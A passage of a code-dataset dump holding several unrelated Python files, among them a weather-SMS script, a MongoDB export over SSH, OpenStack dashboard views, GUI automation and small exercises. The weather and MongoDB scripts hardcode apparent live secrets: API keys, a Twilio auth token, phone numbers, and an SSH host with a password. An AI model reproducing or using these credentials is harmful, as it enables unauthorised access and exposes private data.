\"_GRCh38_\" + map + \"_\" + cc + \"_GATKHC_gvcf.vcf.gz \" + \n\t\t\"-igvcftbi=/\"+HG+\"/GRCh38/\"+ plat +\"/GATKHC_output/\" + HG + \"_\" + str(chr) + \"_GRCh38_\" + map + \"_\" + cc + \"_GATKHC_gvcf.vcf.gz.tbi \" + \n\t\t#\"-iprefix=\" + HG + \"_\" + str(chr) + \"_GRCh38_\" + map + \"_\" + abv + cc + \"_\" + \"GATKHC \" +\n\t\t\"-iref=\" + ref + \" \" +\n\t\t\"-ichrom=chr\" + str(chr)+ \" \" +\n\t\t\"--destination=/\" + HG + \"/\" + \"GRCh38/\" + plat + \"/Integration_prepare_GATKHC_v.3.3.2/\" +\t\n\t\t\"\\n\") \n\t\n\tchr = chr+1 \n\nout.close()\t\n","sub_path":"NISTv3.3.2/DNAnexusCommands/batch_processing_commands/Batch_Processing_shell_scritps_GRCh38/GRCh38/HG001/integration-prepare-gatkhc-v3.3.2-anyref_ILMN_batch_script_GRCh38.py","file_name":"integration-prepare-gatkhc-v3.3.2-anyref_ILMN_batch_script_GRCh38.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"535986691","text":"import requests\n\nimport os\nfrom twilio.rest import Client\n\napi_key = \"e473e1b8f10b4ba7401a8b54e94bcf88\"\ncity = \"santa clara\"\ncountry = \"usa\"\n\nMY_LAT = 37.392727185\nMY_LONG = -121.9486459\n\n# Find your Account SID and Auth Token at twilio.com/console\n# and set the environment variables. See http://twil.io/secure\naccount_sid = 'AC22d36274c59681a3d827df9aa5df5cdb'\nauth_token = 'a43fc4450854e059ce2653237923cb66'\n\nweather_param = {\n 'lat': MY_LAT,\n 'lon': MY_LONG,\n 'exclude': \"hourly,minutely,daily,alerts\",\n 'appid': api_key\n}\n\nONECALL = 'https://api.openweathermap.org/data/2.5/onecall?'\n\nweather_info = requests.get(url=\"http://api.openweathermap.org/data/2.5/weather?q={},{}&appid={}\"\n .format(city, country, api_key))\n# print(weather_info.json())\n# one_call_api = requests.get(url=\"https://api.openweathermap.org/data/2.5/onecall?lat={}&lon={}&appid={}\"\n# .format(MY_LAT,MY_LONG,api_key))\n\none_call_api = requests.get(url=ONECALL, params=weather_param)\n\ncurrent_data = one_call_api.json()[\"current\"]\nprint(current_data)\n\n\ncurr_temp_C = round(current_data['temp']-273.15,2)\ncurr_feels_C = round(current_data['feels_like']-273.15,2)\nprint(curr_temp_C,curr_feels_C)\n\nclient = Client(account_sid, auth_token)\nmessage = client.messages \\\n .create(\n body=\"Your AIjeet says: Weather is {}\\u00b0C feels like {}\\u00b0C. 
Enjoy your run!!🏃‍♀️ \".format(curr_temp_C,curr_feels_C),\n from_='+12158834018',\n to='+14086031986'\n)\n\nprint(message.status,message.sid)\n\n# per_hour_id = []\n# for i in range(0, 12):\n# # print(hourly_data[i]['weather'][0]['id'])\n# per_hour_id.append(hourly_data[i]['weather'][0]['id'])\n#\n# print(per_hour_id)\n# for i in per_hour_id:\n# if i < 800:\n# print(\"Bring Umbrella\")\n\n# client = Client(account_sid, auth_token)\n# message = client.messages \\\n# .create(\n# body=\"Hey Sid, I am your AIjeet\",\n# from_='+12158834018',\n# to='+14086031986'\n# )\n#\n# print(message.sid)\n","sub_path":"rain_check.py","file_name":"rain_check.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"412259670","text":"from sshtunnel import SSHTunnelForwarder\nfrom pymongo import MongoClient\nimport csv,os, datetime\nimport pandas as pd\n\nMONGO_HOST = \"20.186.46.96\"\nMONGO_USER = \"armada\"\nMONGO_PASS = \"ArmUt1lW3b0424\"\nMONGO_DB = \"cmt\"\nMONGO_COLLECTION = \"specialty\"\n\nserver = SSHTunnelForwarder(\n MONGO_HOST,\n ssh_username=MONGO_USER,\n ssh_password=MONGO_PASS,\n remote_bind_address=('127.0.0.1', 27017)\n)\n\nserver.start()\n\nconnection = MongoClient('127.0.0.1', server.local_bind_port)\ndb = connection[MONGO_DB]\n##collection = db[MONGO_COLLECTION]\n##print(connection.database_names())\n\n\n## TASK - pull only the values that were updated during the CMT v1\ndef pullDiffRows(wFile, specialtyId):\n cursor = db.diagnosis.find()\n \n with open(wFile, \"w\", newline='',encoding=\"utf-8\") as outfile:\n fields = [\"_id\",\"icd10Code\",\"icd10Name\",\"icd10Synonym\",\"cabSynonym\",\"clinicalIntakeTerm\",\"patientFacingTermIntake\",\n \"subspecialty\",\"clinicalFocus\",\"region\",\"grouper\",\"specialtyId\",\"createdAt\",\"updatedAt\",\"createdBy\",\"updatedBy\"]\n write = csv.DictWriter(outfile, fieldnames = fields)\n write.writeheader()\n for c in cursor:\n if c['specialtyId'] == specialtyId and isinstance(c[\"updatedAt\"], str) == False: \n c[\"icd10Code\"] = \"|\".join(c[\"icd10Code\"])\n c[\"icd10Name\"] = \"|\".join(c[\"icd10Name\"])\n c[\"icd10Synonym\"] = \"|\".join(c[\"icd10Synonym\"])\n c[\"cabSynonym\"] = \"|\".join(c[\"cabSynonym\"])\n c[\"clinicalIntakeTerm\"] = \"|\".join(c[\"clinicalIntakeTerm\"])\n c[\"patientFacingTermIntake\"] = \"|\".join(c[\"patientFacingTermIntake\"])\n c[\"subspecialty\"] = \"|\".join(c[\"subspecialty\"])\n c[\"clinicalFocus\"] = \"|\".join(c[\"clinicalFocus\"])\n c[\"region\"] = \"|\".join(c[\"region\"])\n c[\"grouper\"] = \"|\".join(c[\"grouper\"])\n write.writerow(c)\n df = pd.read_csv(wFile)\n print(df.shape)\n if df[\"icd10Code\"].count() == 0:\n os.remove(wFile)\n else:\n print(\"Wrote \"+ wFile)\n\ndef fullDump(wFile):\n cursor = db.diagnosis.find()\n with open(wFile, \"w\", newline='') as outfile:\n fields = [\"_id\",\"icd10Code\",\"icd10Name\",\"icd10Synonym\",\"cabSynonym\",\"clinicalIntakeTerm\",\"patientFacingTermIntake\",\n \"subspecialty\",\"clinicalFocus\",\"region\",\"grouper\",\"specialtyId\",\"createdAt\",\"updatedAt\",\"createdBy\",\"updatedBy\"]\n write = csv.DictWriter(outfile, fieldnames = fields)\n write.writeheader()\n for c in cursor:\n c[\"icd10Code\"] = \"|\".join(c[\"icd10Code\"])\n c[\"icd10Name\"] = \"|\".join(c[\"icd10Name\"])\n c[\"icd10Synonym\"] = \"|\".join(c[\"icd10Synonym\"])\n c[\"cabSynonym\"] = \"|\".join(c[\"cabSynonym\"])\n c[\"clinicalIntakeTerm\"] = \"|\".join(c[\"clinicalIntakeTerm\"])\n 
c[\"patientFacingTermIntake\"] = \"|\".join(c[\"patientFacingTermIntake\"])\n c[\"subspecialty\"] = \"|\".join(c[\"subspecialty\"])\n c[\"clinicalFocus\"] = \"|\".join(c[\"clinicalFocus\"])\n c[\"region\"] = \"|\".join(c[\"region\"])\n c[\"grouper\"] = \"|\".join(c[\"grouper\"])\n write.writerow(c)\n print(\"Wrote \"+ wFile)\n\n# ypcudw34p = Endo\n# tv00rkp52 = Ophtho\n# 9mwojwsy5 = Ortho\n# 8yahp90r7 = Peds Endo\n# v6jg8uzhn = Peds Ortho\noutputDir1 = \"output/MongoDump/\"\nwFile = [\"cmt_Endo.csv\",\"cmt_Ophtho.csv\",\"cmt_Ortho.csv\",\"cmt_EndoPeds.csv\",\"cmt_OrthoPeds.csv\"]\nspecialtyId = [\"ypcudw34p\",\"tv00rkp52\",\"9mwojwsy5\", \"8yahp90r7\",\"v6jg8uzhn\"]\nos.chdir(outputDir1)\nfullDump(\"diagnosis_v1.csv\")\nfor k,v in enumerate(specialtyId):\n pullDiffRows(wFile[k], v)\n\n# close ssh tunnel\nserver.stop()\n","sub_path":"ClinicalDocs_parser/readFromMongodb.py","file_name":"readFromMongodb.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"597580482","text":"# Copyright 2012 NEC Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nViews for managing Neutron Networks.\n\"\"\"\nfrom django.core.urlresolvers import reverse\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom horizon import exceptions\nfrom horizon import forms\nfrom horizon import tables\nfrom horizon.utils import memoized\n\nfrom django.utils.datastructures import SortedDict\n\nimport ast\n\nimport json\n\nfrom openstack_dashboard import api\n\nfrom openstack_dashboard.contrib.custom.utils import timeutils\n\nfrom openstack_dashboard.contrib.custom.content.openstack_plus.tickets \\\n import forms as project_forms\nfrom openstack_dashboard.contrib.custom.content.openstack_plus.tickets \\\n import tables as project_tables\nfrom openstack_dashboard.contrib.custom.db import api as db_api\n\nfrom openstack_dashboard.dashboards.project.volumes.volumes import views\n\n\nclass IndexView(tables.DataTableView):\n table_class = project_tables.TicketsTable\n template_name = 'openstack_plus/tickets/index.html'\n\n @memoized.memoized_method\n def _get_tenant_list(self):\n try:\n tenants, has_more = api.keystone.tenant_list(self.request)\n except Exception:\n tenants = []\n msg = _('Unable to retrieve ticket project information.')\n exceptions.handle(self.request, msg)\n\n tenant_dict = SortedDict([(t.id, t) for t in tenants])\n return tenant_dict\n\n @memoized.memoized_method\n def _get_user_list(self):\n try:\n users = api.keystone.user_list(self.request)\n except Exception:\n users = []\n msg = _('Unable to retrieve ticket users information.')\n exceptions.handle(self.request, msg)\n\n user_dict = SortedDict([(u.id, u) for u in users])\n return user_dict\n\n def get_data(self):\n try:\n tickets = db_api.ticket_get_all(self.request)\n except Exception:\n tickets = []\n msg = _('Ticket list can not be retrieved.')\n exceptions.handle(self.request, 
msg)\n\n if tickets:\n tenant_dict = self._get_tenant_list()\n for ticket in tickets:\n tenant = tenant_dict.get(ticket['project_id'], None)\n ticket.tenant_name = getattr(tenant, 'name', None)\n user_dict = self._get_user_list()\n for ticket in tickets:\n user = user_dict.get(ticket['user_id'], None)\n ticket.user_name = getattr(user, 'name', None)\n\n return tickets\n\n\nclass UpdateView(forms.ModalFormView):\n form_class = project_forms.EditTicket\n template_name = 'openstack_plus/tickets/update.html'\n context_object_name = 'ticket'\n success_url = reverse_lazy(\"horizon:openstack_plus:tickets:index\")\n\n def get_context_data(self, **kwargs):\n context = super(UpdateView, self).get_context_data(**kwargs)\n context[\"ticket_id\"] = self.kwargs['ticket_id']\n ticket_id = self.kwargs['ticket_id']\n try:\n ticket = db_api.ticket_get_by_id(self.request, ticket_id)\n except Exception:\n ticket = None\n if ticket is not None:\n context[\"type\"] = ticket.type\n if ticket.type == \"quota\":\n context[\"ticket\"] = ast.literal_eval(ticket.context)\n elif ticket.type == \"volume\":\n volume = json.loads(ticket.context)\n context[\"volume\"] = volume\n try:\n if(volume[\"volume_source_type\"] == \"volume_source\"):\n volume = api.cinder.volume_get(\n self.request,\n volume[\"volume_source\"])\n context[\"volume_source\"] = volume\n elif(volume[\"volume_source_type\"] == \"image_source\"):\n image = api.glance.image_get(\n self.request,\n volume[\"image_source\"])\n context[\"volume_source\"] = image\n elif(volume[\"volume_source_type\"] == \"snapshot_source\"):\n snapshot = api.cinder.volume_snapshot_get(\n self.request,\n volume[\"snapshot_source\"])\n context[\"volume_source\"] = snapshot\n context[\"volume_source_error\"] = False\n except Exception:\n context[\"volume_source_error\"] = True\n elif ticket.type == \"instance\":\n context[\"instance\"] = json.loads(ticket.context)\n context[\"flavor\"] = api.nova.flavor_get(\n self.request, context[\"instance\"][\"flavor\"])\n elif ticket.type == \"resize_volume\":\n context[\"volume\"] = json.loads(ticket.context)\n elif ticket.type == \"resize_instance\":\n context[\"instance\"] = json.loads(ticket.context)\n else:\n # ticket.type == \"normal\"\n context[\"description\"] = ticket.description\n return context\n\n @memoized.memoized_method\n def _get_object(self, *args, **kwargs):\n ticket_id = self.kwargs['ticket_id']\n try:\n return db_api.ticket_get_by_id(self.request, ticket_id)\n except Exception:\n redirect = self.success_url\n msg = _('Unable to retrieve ticket details.')\n exceptions.handle(self.request, msg, redirect=redirect)\n\n def get_initial(self):\n ticket = self._get_object()\n return {'ticket_id': ticket['id']}\n\n\nclass CreateView(views.CreateView):\n def post(self, request, *args, **kwargs):\n ticket_id = self.kwargs['ticket_id']\n ticket = db_api.ticket_get_by_id(self.request, ticket_id)\n request.POST.update(json.loads(ticket.context))\n return super(CreateView, self).post(request, *args, **kwargs)\n\n\nclass Ticket(object):\n def __init__(self, id, title, description, status,\n status_desc, created_at):\n self.id = id\n self.title = title\n self.description = description\n self.status = status\n self.status_desc = status_desc\n self.created_at = created_at\n\n\nclass TicketReply(object):\n def __init__(self, id, user_id, create_time, content, user_name, is_admin):\n self.id = id\n self.user_id = user_id\n self.create_time = create_time\n self.content = content\n self.user_name = user_name\n self.is_admin = 
is_admin\n\n\nclass DetailView(forms.ModalFormView):\n form_class = project_forms.CreateForm\n template_name = 'openstack_plus/tickets/detail.html'\n success_url = \"horizon:openstack_plus:tickets:detail\"\n\n @memoized.memoized_method\n def _get_user_list(self):\n try:\n users = api.keystone.user_list(self.request)\n except Exception:\n users = []\n msg = _('Unable to retrieve ticket users information.')\n exceptions.handle(self.request, msg)\n\n user_dict = SortedDict([(u.id, u) for u in users])\n return user_dict\n\n def get_context_data(self, **kwargs):\n context = super(DetailView, self).get_context_data(**kwargs)\n ticket_id = self.kwargs['ticket_id']\n ticket_db = db_api.ticket_get_by_id(self.request, ticket_id)\n created_time = timeutils.format_time(ticket_db.created_at)\n status_desc = ticket_db.status.capitalize()\n ticket = Ticket(ticket_db.id, ticket_db.title, ticket_db.description,\n ticket_db.status, status_desc, created_time)\n all_ticket_reply = db_api.get_all_ticket_reply_by_ticket_id(\n self.request, ticket_id)\n reply_list = []\n user_dict = self._get_user_list()\n for reply in all_ticket_reply:\n created_time = timeutils.format_time(reply.created_at)\n user = user_dict.get(reply['user_id'], None)\n user_name = getattr(user, 'name', None)\n reply_list.append(TicketReply(reply.id, reply.user_id,\n created_time, reply.content,\n user_name, reply.is_admin))\n context[\"ticket\"] = ticket\n context[\"ticket_id\"] = ticket_id\n context[\"all_ticket_reply\"] = reply_list\n\n return context\n\n def get_initial(self):\n return {'ticket_id': self.kwargs[\"ticket_id\"]}\n\n def get_success_url(self, **kwargs):\n ticket_id = self.kwargs['ticket_id']\n return reverse(self.success_url,\n kwargs={\"ticket_id\": ticket_id})\n","sub_path":"openstack_dashboard/contrib/custom/content/openstack_plus/tickets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"461840959","text":"import pyautogui as gui\nimport screenSearch as ss\nimport utilities as utils\nimport terminal\nimport demos\nimport sys\n\n\n# from pynput.mouse import Listener\nfrom pynput import mouse\nfrom pynput import keyboard\n\n# KNOWN ISSUE: Due to MacOs Retina display, coordinates have to be divided by two...\n# Change iphone name = Settings>General>About>Name\n# Image is set to default since we are not friends\n\n# TODO: Keyboard input to quit\n\n# brew cask install xquartz\n# brew install wmctrl\n\n\nUL = 1\nLR = 2\nFILE = 3\nSTARTED = 4\n\nstate = UL\nul = None\nlr = None\nfile = None\n\n# Screen constants\nLISTBUTTON_LISTROW_Y = 55 # Number of pixels between the corner of the list button and the first list row\n\n\n\n\ndef nextState():\n\tglobal state\n\tstate += 1\n\n# Spin the system for timeWait number of seconds\ndef waitFor(timeWait):\n\tstartTime = time.time()\n\tendTime = startTime + timeWait\n\twhile time.time() < endTime:\n\t\tpass\n\ndef waitForState():\n\tif state == UL:\n\t\twhile ul is None:\n\t\t\tpass\n\telif state == LR:\n\t\twhile lr is None:\n\t\t\tpass\n\telif state == FILE:\n\t\twhile file is None:\n\t\t\tpass\n\tutils.waitFor(1)\n\ndef on_move(x, y):\n\tpass\ndef on_scroll(x, y, dx, dy):\n\tpass\n\ndef on_click(x, y, button, pressed):\n\tglobal ul\n\tglobal lr\n\tglobal file \n\tx = int(x)\n\ty = int(y)\n\tprint(\"x=\"+str(x)+\", y=\"+str(y))\n\tif state == UL:\n\t\tul = (x, y)\n\t\tprint(\"set\")\n\telif state == LR:\n\t\tlr = (x, y)\n\telif state == FILE:\n\t\tfile = (x, 
y)\n\nlistener = mouse.Listener(on_move=on_move, on_click=on_click, on_scroll=on_scroll)\nlistener.start()\n\n\n# def on_press(key):\n# try:\n# print('alphanumeric key ' + key.char + ' ' + str(type(key.char)) + ' pressed')\n# if key.char == 'q':\n# \tprint('here')\n# \tsys.exit(0)\n# \texit()\n# except AttributeError:\n# print('special key {0} pressed'.format(key))\n\n# def on_release(key):\n# \tpass\n# # print('{0} released'.format(\n# # key))\n# # if key == keyboard.Key.esc:\n# # # Stop listener\n# # return False\n\n# listener = keyboard.Listener(on_press=on_press, on_release=on_release)\n# listener.start()\n\n\n\n# Can be optimized by taking own screenshot and searching image for both locations together\ndef launchAirdrop():\n\tterminal.focusAirdropWindow()\n\tpositionAirdropWindow()\n\tresizeAirdropWindow()\n\ndef findAirdropGUI():\n\t# (left, top, width, height)\n\tairdropBoxCoor = None\n\twhile airdropBoxCoor is None:\n\t\tairdropBoxCoor = ss.locateOnScreen('images/dark/airdropHeader.png')\n\tbuttonsBoxCoor = None\n\twhile buttonsBoxCoor is None: \n\t\tbuttonsBoxCoor = ss.locateOnScreen('images/dark/upperLeftButtons.png')\n\treturn (airdropBoxCoor, buttonsBoxCoor)\n\ndef positionAirdropWindow():\n\tairdropBoxCoor, buttonsBoxCoor = findAirdropGUI()\n\t# Move window to upper left corner\n\tgrabCoor = gui.center(airdropBoxCoor)\n\t# Drag screen until red button touches left screen edge\n\tbufferX = grabCoor[0] - buttonsBoxCoor[0]\n\tgui.moveTo(grabCoor[0], grabCoor[1])\n\tgui.dragTo(bufferX, 0, button='left', duration=0.5)\n\ndef resizeAirdropWindow():\n\tairdropBoxCoor, buttonsBoxCoor = findAirdropGUI()\n\thalfWindowLength = gui.center(airdropBoxCoor)[0] - buttonsBoxCoor[0]\n\tedge = (gui.center(airdropBoxCoor)[0] + halfWindowLength, airdropBoxCoor[1])\n\tscreenWidth, _ = gui.size()\n\tgui.moveTo(edge[0], edge[1], duration=0.5)\n\tgui.dragTo(int(screenWidth/2), edge[1], button='left', duration=0.5)\n\n\n\n\n\n\ndef launchAdsDirectory():\n\tterminal.focusAdsDirectoryWindow()\n\tpositionAdsDirectoryWindow()\n\tresizeAdsDirectoryWindow()\n\ndef findAdsDirectoryGUI():\n\tadsBoxCoor = None\n\twhile adsBoxCoor is None:\n\t\tadsBoxCoor = ss.locateOnScreen('images/dark/adsDirHeader.png')\n\tbuttonsBoxCoor = None\n\twhile buttonsBoxCoor is None: \n\t\tbuttonsBoxCoor = ss.locateOnScreen('images/dark/upperLeftButtons.png')\n\treturn (adsBoxCoor, buttonsBoxCoor)\n\ndef positionAdsDirectoryWindow():\n\tadsBoxCoor, buttonsBoxCoor = findAdsDirectoryGUI()\n\t# (left, top, width, height)\n\tgrabCoor = gui.center(adsBoxCoor)\t\n\t# Half the length of the window\n\tlengthHalfWindow = grabCoor[0] - buttonsBoxCoor[0]\n\tscreenWidth, _ = gui.size()\n\tbufferX = screenWidth - lengthHalfWindow\n\tgui.moveTo(grabCoor[0], grabCoor[1])\n\tgui.dragTo(bufferX, 0, button='left', duration=0.5)\n\t# Now make sure items in the directory are in list mode\n\tlistButtonUnclickedCoor = ss.locateOnScreen('images/dark/adsListButtonUnclicked.png')\n\tif listButtonUnclickedCoor is not None:\n\t\tclickCoor = gui.center(listButtonUnclickedCoor)\n\t\tgui.moveTo(clickCoor[0], clickCoor[1])\n\t\tgui.mouseDown()\n\t\tgui.mouseUp()\n\ndef resizeAdsDirectoryWindow():\n\t_, buttonsBoxCoor = findAdsDirectoryGUI()\n\tedge = (buttonsBoxCoor[0] - 5, buttonsBoxCoor[1])\n\tscreenWidth, _ = gui.size()\n\tgui.moveTo(edge[0], edge[1], duration=0.5)\n\tgui.dragTo(int(screenWidth/2) + 10, edge[1], button='left', duration=0.5)\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef main():\n\tprint(\"Select the upper left corner of the airdrop 
window\")\n\twaitForState()\n\tnextState()\n\n\tprint(\"Select the lower right corner of the airdrop window\")\n\twaitForState()\n\tnextState()\n\n\tprint(\"Select your file\")\n\twaitForState()\n\tnextState()\n\n\tprint(\"ul = \" + str(ul))\n\tprint(\"lr = \" + str(lr))\n\tprint(\"file = \" + str(file))\n\n\t# Practice file drag:\n\tgui.moveTo(file[0], file[1])\n\t# exPt = (int((ul[0]+lr[0])/2), int((ul[1]+lr[1])/2) - 100)\n\texPt = (800, 240)\n\tgui.dragTo(exPt[0], exPt[1], button='left', duration=1)\n\n\n\n\nif __name__ == '__main__':\n\t#main()\n\tlaunchAirdrop()\n\tlaunchAdsDirectory()\n\n\t# demos.moveBetweenProfileCenters()\n\t# demos.boxNames()\n\t# demos.printNames()\n\t# demos.printProfiles()\n\tdemos.dragAdsToProfiles()\n\n\t# coor = ss.locateAd(2)\n\t# print(coor)\n\t# gui.moveTo(coor)\n\t# gui.mouseDown()\n\t# gui.mouseUp()\n\n\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"596408067","text":"\"\"\"\nAuthor: Bruno Luca\nDate: 15-10-2020\nProgramma che cifra un messaggio dato dall'utente con chiave inserita da tastiera usando un cifrario di Vernan\n\"\"\"\n\nnumber2char = {}\nchar2number = {}\nfor i in range (65,91):\n char2number[chr(i)] = i - 65\n number2char[i-65] = chr(i)\n\ndef cifratore(msg = input(\"MESSAGGIO>> \"),chiave = input(\"CHIAVE>> \")):\n\n global number2char\n global char2number\n\n while len(msg) > len(chiave):\n print(f\"key lenght must be at least {len(msg)}...\\t current({len(chiave)})\")\n chiave = input(\"CHIAVE>> \")\n\n msg = msg.upper()\n chiave = chiave.upper()\n\n cifred_msg = \"\"\n for i,c in enumerate(msg):\n print(chiave[i])\n if ord(c) in range(65,91):\n cifred_msg = cifred_msg + number2char[(char2number[c] + char2number[chiave[i]])%26]\n else:\n cifred_msg = cifred_msg + c\n\n decifratore(cifred_msg,chiave)\n\n\ndef decifratore(msg,chiave):\n\n global number2char\n global char2number\n\n print(f\"\"\" \n cifratore has \n msg = {msg}\n key = {chiave}\n \"\"\")\n\n dec_msg = \"\"\n for i,c in enumerate(msg):\n if ord(c) in range(65,91):\n dec_msg = dec_msg + number2char[(char2number[c] - char2number[chiave[i]])%26]\n else:\n dec_msg = dec_msg + c\n\n print(f\"DECRIPTED MSG>> {dec_msg}\")\n\n\nif __name__ == \"__main__\":\n cifratore()","sub_path":"sistemi_V/python/es001_vernan/cifratore.py","file_name":"cifratore.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"607500750","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('board/', views.home, name = 'home'),\n path('show_write_form/', views.show_write_form),\n path('DoWriteBoard/', views.DoWriteBoard),\n path('listSpecificPageWork/', views.listSpecificPageWork),\n path('view/', views.viewWork, name = 'viewWork'),\n]","sub_path":"board/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"276071980","text":"class Solution:\n def isPowerOfThree(self, n):\n \"\"\"\n :type n: int\n :rtype: bool\n \"\"\"\n if n <= 0:\n return False\n import math\n return math.pow(3,19) % n == 0\n\ndef main():\n import sys\n def readlines():\n for line in sys.stdin:\n yield line.strip('\\n')\n\n lines = readlines()\n while True:\n try:\n line = next(lines)\n n = int(line);\n \n ret = Solution().isPowerOfThree(n)\n\n out = (ret);\n print(out)\n except StopIteration:\n break\n\nif __name__ == '__main__':\n main()","sub_path":"pytcode/326. Power of Three/Power_of_Three.py","file_name":"Power_of_Three.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"564589029","text":"from random import randrange\nfrom functools import reduce\n\n\ndef union(a, x):\n a.add(x)\n return a\n\n\ndef reverse(a, x):\n a.insert(0, x)\n return a\n\n\ndef fun(value, *action):\n d_1 = {'sum': lambda a, x: a + x,\n 'multiply': lambda a, x: a * x,\n 'join': lambda a, x: 10 * a + x,\n 'union': union,\n 'reverse': reverse}\n\n d_2 = {'negated': lambda x: -x,\n 'inverted': lambda x: 1 / x,\n 'squared': lambda x: x * x}\n\n d_3 = {'odds': lambda x: x % 2 != 0,\n 'evens': lambda x: x % 2 == 0,\n 'simples': lambda x: x in {1, 2, 3, 5, 7}}\n\n d_start = {'sum': 0, 'multiply': 1, 'join': 0, 'union': set(), 'reverse': list()}\n\n return reduce(d_1[action[0]], map(d_2[action[1]], filter(d_3[action[2]], value)), d_start[action[0]])\n\n\nL = int(input('N: '))\nseq = []\nfor i in range(L):\n seq.append(randrange(1, 10))\n\nprint(seq)\n\nwhile True:\n actions = input('Action: ')\n actions = actions.split(' ')\n\n try:\n seq = fun(seq, *actions)\n except (KeyError, IndexError):\n print('Action is not correct.\\nTry again.')\n else:\n break\n\nprint(seq)\n","sub_path":"HW_3/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"89042524","text":"#----------------------------------Datos del problema-------------------------------------\n#Ejercicio #\n# Escribe el programaque lea muchos valores de n y que calcule la expresión\n# Roberto Carlos Llanes Montero (Equipo 'about:blank')\n\n#----------------------------------Prototipo de funciones----------------------------------\n#Python no permite la creación de prototipos debido al funcionamiento de la definición de \n#sus funciones, de hecho, gran parte de estos conceptos estan haciendo más lento al proceso\n#de python :c\n\n#----------------------------------------Funciones------------------------------------------\n#También python no acepta poner funciones al final :c\n\ndef getEne():\n\tEne = int(input())\n\treturn Ene \ndef proceso(n):\n\tprint(\"y = 1\",end = ' ')\n\tif( n == 1 ):\n\t\tprint(\"+ x\",end = ' ')\t\n\telse:\n\t\tfor i in range(1,Ene+1):\n\t\t\tsalida(i)\n\t\t\t\t\ndef salida(n):\n\tif( n > 1 ):\n\t\tif( n % 2 == 0 ):\n\t\t\tprint(\"+ {}x^{}/{}!\".format(n,n,n),end = ' 
')\n\t\telse:\n\t\t\tprint(\"- {}x^{}/{}!\".format(n,n,n),end = ' ')\n\n#----------------------------------------Proceso-------------------------------------------\n#Obtener el dato de inicio\nEne = getEne()\n#Proceso\nproceso(Ene)\n","sub_path":"Unidad 3-Funciones/Ejercicio53.py","file_name":"Ejercicio53.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"554294119","text":"import turtle\nimport random\nimport time\n\ngame_over = False\n\nplayer_pos = [0, 0]\nplayer_stamp = -1\ntracks = []\ntrack_stamps = []\nscore = 0\n\nturtle.pu()\nturtle.tracer(0,0)\nturtle.bgcolor('black')\n\nfont = turtle.Turtle()\n\ndef reset():\n global tracks, track_stamps, player_pos, player_stamp, score, game_over\n\n turtle.clearstamp(player_stamp)\n clear_track()\n \n game_over = False\n score = 0\n player_pos = [0, 0]\n player_stamp = -1\n tracks = []\n track_stamps = [] \n for i in range(21): \n tracks.append({'position': [0, 200 - i * 20], 'width': 150})\n\ndef clear_track():\n global track_stamps\n for track in track_stamps:\n turtle.clearstamp(track)\n track_stamps = []\n\ndef draw_track():\n global tracks\n for track in tracks:\n x_pos = track['position'][0] - track['width']/2\n y_pos = track['position'][1]\n turtle.color('blue')\n turtle.setpos(x_pos, y_pos)\n turtle.shape('square')\n track_stamps.append(turtle.stamp())\n\n x_pos = track['position'][0] + track['width']/2\n y_pos = track['position'][1]\n turtle.color('blue')\n turtle.setpos(x_pos, y_pos)\n turtle.shape('square')\n track_stamps.append(turtle.stamp())\n\ndef scroll_track():\n global tracks, score\n\n score += 5\n tracks.pop(0)\n for track in tracks:\n track['position'][1] += 20\n x_pos = tracks[len(tracks)-1]['position'][0]\n width = tracks[len(tracks)-1]['width']\n \n step = random.randint(-2, 2)\n x_pos += step * 10\n \n width_step = random.randint(-1, 1)\n width += width_step * 5\n if (width <= 70):\n width = 70\n if (width >=150):\n width = 150\n\n if x_pos - width/2 < -200:\n x_pos = -200 + width/2\n if x_pos + width/2 > 200:\n x_pos = 200 - width/2\n tracks.append({'position': [x_pos, -200], 'width': width})\n\ndef draw_player():\n global player_stamp, score\n\n font.clear()\n font.ht()\n font.setpos(-70, 220)\n font.color(\"white\")\n font.write(\"Score: \" + str(score), font=(\"Terminal\", 16, \"normal\"))\n \n turtle.clearstamp(player_stamp)\n turtle.setpos(player_pos)\n turtle.shape('square')\n turtle.color('red')\n player_stamp = turtle.stamp()\n\ndef check_collision():\n global game_over, player_pos, tracks\n row = int((200 - player_pos[1]) / 20)\n if player_pos[0] <= (tracks[row]['position'][0] - tracks[row]['width']/2):\n game_over = True\n elif player_pos[0] >= (tracks[row]['position'][0] + tracks[row]['width']/2):\n game_over = True\n\ndef run_game():\n \n global game_over\n try:\n check_collision()\n if not game_over: \n scroll_track()\n clear_track()\n draw_track()\n\n draw_player()\n 